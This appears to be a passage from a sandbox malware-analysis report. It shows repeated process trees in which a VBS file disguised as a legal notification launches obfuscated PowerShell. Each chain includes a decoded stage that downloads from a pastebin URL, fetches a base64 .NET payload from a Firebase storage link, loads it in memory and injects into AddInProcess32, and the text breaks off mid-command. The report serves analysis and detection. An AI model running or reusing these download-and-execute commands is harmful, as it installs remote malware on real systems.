                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5776
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5920
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:6068
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                      1⤵
                                      • Checks computer location settings
                                      PID:5144
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5280
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5428
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:884
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                      1⤵
                                      • Checks computer location settings
                                      PID:5580
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2852
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:748
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2240
                                    • C:\Windows\System32\Notepad.exe
                                      "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs
                                      1⤵
                                      • Opens file in notepad (likely ransom note)
                                      PID:5492
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
                                      1⤵
                                      • Checks computer location settings
                                      PID:4732
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = 